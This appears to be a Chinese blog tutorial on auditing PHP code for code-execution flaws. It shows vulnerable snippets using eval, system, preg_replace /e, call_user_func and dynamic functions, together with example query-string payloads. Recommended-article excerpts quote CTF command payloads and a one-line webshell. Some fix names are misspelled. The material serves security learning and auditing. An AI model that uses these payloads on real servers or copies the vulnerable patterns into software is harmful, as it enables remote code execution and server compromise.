学php看漏洞代码,PHP代码审计学习(5)——代码执行漏洞

最新推荐文章于 2023-12-08 18:00:00 发布
最新推荐文章于 2023-12-08 18:00:00 发布
阅读量125 收藏
点赞数
文章标签: 学php看漏洞代码

标签:user   配置   字符   应用   定义   漏洞   通过   就是   来替

代码执行

代码执行是指应用程序本身过滤不严,当应用在调用一些字符串函数的时候用户可以通过请求将代码注入到应用中执行。

存在于eval()、assert()、preg_replace()、call_user_func()、array_map()以及动态函数中,很难通过黑盒测试查找。

挖掘思路

1:用户能够控制函数输入

2:存在可执行的危险函数

常见危险函数

1、eval和assert

这俩两个函数原本作用就是动态执行代码,所以他们的参数直接就是PHP代码

phpif(isset($_REQUEST[‘cmd‘])){

$cmd= ($_REQUEST["cmd"]);

system($cmd);//eval($cmd);

echo "$cmd";

die;

}?>

因为对传入没有过滤,所以直接传入PHP代码

?cmd=phpinfo();

2、preg_replace函数

对字符串进行正则处理,一般挖掘的时候是都是绕过正则的

phppreg_replace("/\[(.*)\]/e",‘\\1‘,$_GET[‘str‘]);?>

第一组是匹配中括号的的内容,\\1作为第一组的结果填充,这里是直接执行代码,所以

?str=[phpinfo()]

就能直接执行phpinfo()

3、回调函数

call_user_func()和array_map()等都有调用其他函数的功能,过滤不严且传入参数可控,就可以调用函数来执行代码

php$b="phpinfo()";call_user_func($_GET[‘a‘],$b);?>

当传入assert函数的时候,就可以执行phpinf()

?a=assert

4、动态函数执行(重点)

因为PHP的特性,PHP函数可以由字符串拼接,我们可以用一个变量名去代替一个函数

php$_GET[‘a‘]{$_GET[‘b‘]};?>

接受a的参数作为函数,b的为函数的参数,所以传入

?a=assert&b=phpinfo()

就会打印PHP的信息

修复

1、尽量不要执行外部的应用程序或命令

2、使用自定义函数或函数库来替代外部应用程序或命令的功能

3、使用escappeshellarg函数来处理命令的参数

4、使用sare_mode_exec_dir来指定可执行的文件路径

5、将执行的参数做白名单限制,在代码或配置文件中限制某些参数

PHP代码审计学习(5)——代码执行漏洞

标签:user   配置   字符   应用   定义   漏洞   通过   就是   来替

重离子猫猫
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【基础篇】第01篇:PHP代码审计笔记--SQL注入1
08-03
PHP代码审计笔记——SQL注入1】主要探讨的是在PHP环境中如何防止SQL注入攻击,特别是针对MySQL数据库。SQL注入是一种常见的网络安全威胁,攻击者通过构造恶意的SQL语句,利用程序漏洞执行非授权的操作,如获取...
[红日安全]代码审计Day3 - 实例化任意对象漏洞.pdf
09-20
本文主要探讨的是PHP代码审计中的一个重要主题:实例化任意对象漏洞。该漏洞通常发生在开发者允许用户输入控制类名或者构造函数参数的情况下,攻击者可能借此执行恶意操作,如文件包含、XXE攻击甚至命令执行。 首先...
ctfhub-eval执行
m0_52432374的博客
03-24 1957
ctfhub-eval执行 打开题目,发现是这个 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 然后百度eval()函数 eval():把字符串 code 作为PHP代码执行函数eval()语言结构是 非常危险的, 因为它允许执行任意 PHP 代码。 它这样用是很危险的。 如果您仔细的确认过,除了使用此结构以外 别无方法
NO.3-9 [FBCTF2019]RCEService
nigo134的博客
08-06 275
题目叫我们以JSON的格式提交命令,先随便输 提交JSON格式 ?cmd={"cmd":"ls"} 但是经测试发现很多命令被禁止了 在网上找到的源码2333: <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { $json = $_REQUEST['cmd']; if (!is_string($json)) { echo 'Hacking attempt de...
【HTB系列】靶机Bitlab的渗透测试
Ms08067安全实验室
02-07 804
本文作者:是大方子(Ms08067实验室核心成员)﹀﹀﹀0x00 本文目录反思与总结基本信息渗透测试过程补充0x01 反思与总结1.curl发送GET参数化请求 2.对反弹回来的s...
CTFHUB——RCE之eval执行和文件包含漏洞
m0_46467017的博客
08-31 5234
代码解释:本关代码和第一关文件包含一样,通过strpos函数判断参数是否存在flag字符,存在就执行include函数。因为本关没有限制php://input伪协议,所以本关解法和上一关一样,这里就不再赘述了。代码解释:本关代码和之前php://input关卡一样,通过substr函数来判断file参数是否等于php://,如果等于就执行include函数代码解释为如果存在cmd参数,那就用eval函数执行cmd参数中的代码,所以本关存在命令执行。连接成功后,其余步骤与上一关相同。...
CTFHub_技能树_Web之RCE——“eval执行”、“命令注入”
Ho1aAs‘s Blog
07-23 8956
文章目录一、eval执行二、命令注入完 –>CTFHub传送门<– 一、eval执行 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> PHP代码显示,要求将命令赋值给cmd然后执行 先查看一下根目录文件 /?cmd=system("ls"); !切记最后的分号不可省略! 没有需要的文件 看看上一级的文件夹 /
自动化代码审计de一些思路与局限——基于静态分析的PHP代码审计技术探.pdf
08-08
《自动化代码审计:基于静态分析的PHP代码审计技术探析》 在当今信息化时代,软件安全问题日益凸显,其中代码审计扮演着至关重要的角色。本文主要探讨了静态分析这一技术在自动化代码审计中的应用,旨在提高代码的...
网络安全+CTF+源码审计+O泡易支付V1.zip
11-19
在这个O泡易支付V1的案例中,参与者可能需要通过审计代码来识别可能的SQL注入、跨站脚本(XSS)、命令注入、信息泄漏等常见漏洞PHP是Web开发中广泛使用的服务器端脚本语言,但其灵活性也可能导致安全问题。例如...
「信息安全」自动化代码审计de一些思路与局限——基于静态分析的PHP代码审计技术探 - 安全防御.zip
11-28
本主题探讨了基于静态分析的PHP代码审计技术,旨在揭示其在安全防御中的应用、潜在思路以及存在的局限性。 一、静态分析概述 静态分析是一种不执行程序的情况下,通过对源代码或编译后的二进制文件进行分析,来检测...
CTFhub技能树_Web RCE
weixin_45897324的博客
10-11 1186
一、eval执行 1.分析: 打开网站显示如下代码: <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 大体意思是:判断cmd是否被设置,若cmd被赋值,则执行如下语句,否则就继续显示以上代码。 eval($_REQUEST["cmd"]); 其中: eval():该函数可以把字符串作为PHP代码执行 $_REQUEST['
CTFHub 技能树-- RCE(详解)
m0_62879498的博客
02-20 5282
CTFHub – RCE RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统 eval执行文件 查看一开始的源代码: <?php if(isset($_REQUEST['cmd'])){ eval($_REQUEST['cmd']); } else{ highlight_file(__FILE__); } ?> php函数意思是: 是否由变量cmd 如果有,就执行eval($_REQUEST['cmd
新洞!CVE-2021-40870 Aviatrix-Controller 远程代码执行Getshell
风洞网
10-15 1291
洞悉安全,风洞网,认准官方网站! FOFA语法:app="Aviatrix-Controller" CVE-2021-40870 漏洞利用 在 6.5-1804.1922 之前的 Aviatrix Controller 6.x 中发现了一个问题。可以不受限制地上传具有危险类型的文件,这允许未经身份验证的用户通过目录遍历执行任意代码。 POC def poc_attack(url): try: url = url + "/" filename = "RCE.p
网络安全——文件上传漏洞及防御
qq_39103818的博客
03-12 787
没有网络安全就没有国家安全 不知攻,焉知防 自动化网络防御体系 监控,比如网卡流量异常的时候,当CPU负载异常的时候 法律原因,不要对任何网站进行渗透扫描和漏扫,都属于有网络攻击的意向,属于犯法行为。 有专门的靶机 文件上传漏洞 没有经过后缀名的筛选,允许任何类的文件上传。 如果是一些php,asp的文件上传后,则相当于黑客直接拿到了webshell,还能通过中国菜刀之类的工具去控制这个网站。 1...
代码审计 | call_user_func 命令执行
最新发布
INSBUG的博客
12-08 297
$_SERVER['HTTP_X_FORWARDED_FOR']`伪造的问题,应该检查`$_SERVER['REMOTE_ADDR']`和`$_SERVER['HTTP_CLIENT_IP']`。对于call_user_func函数造成的命令执行漏洞,需要对`$_GET['cmd']`和`$_GET['arg']`进行严格的过滤和验证。call_user_func 函数会调用 $callback 指定的回调函数,并将传递的参数列表作为回调函数的参数。它会返回回调函数执行的结果。2023年12月8日。
php黑名单绕过,安全杂谈——linux通配符绕过文件名黑名单
weixin_35886741的博客
03-11 207
原标题:安全杂谈——linux通配符绕过文件名黑名单原创:hl0rey安全初心5月27日glob 模式(globbing)也被称之为 shell 通配符,名字的起源来自于 Unix V6 中的 /etc/glob (详见 man 文档)。glob 是一种特殊的模式匹配,最常见的是通配符拓展,也可以将 glob 模式设为精简了的正则表达式,在最新的 CentOS 7 中已经删除了 glob 的相关描...
【CTFHub】RCE
qq_61109509的博客
02-22 599
eval执行 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 先查看下目录 /?cmd=system('ls'); 看来这一级啥都没有,那我们看看上一级文件夹 /?cmd=system('ls /'); 打开flag,注意打开的是下一级 /?cmd=system('cat /flag_30311..
PHP安全之webshell和后门检测
weixin_30517001的博客
05-06 557
一、各种webshell 一句话木马,其形式如下所示: <?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST["cmd"]); system($cmd); echo"</pre>$cmd<pre>"; die; } ?> 这种容易被安全软件检...
php一句话木马变形技巧
热门推荐
bylfsj的博客
09-24 4万+
一、什么是一句话木马? 一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。 二、我们如何发送命令,发送的命令如何执行? 我们可以通过 GET、POST、COOKIE这三种方式向一个网站提交数据,一句话木马用 $_GET[' ']、$_POST[' ']、$_COOKIE[' ...
php代码审计-代码执行.pdf
12-14
这篇文档主要探讨了PHP代码审计中的一个重要主题——代码执行,这是渗透测试中常见的安全问题。通过代码审计,开发者和安全专家可以识别并修复潜在的安全漏洞,防止恶意攻击者利用这些漏洞执行任意代码。 一、介绍 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值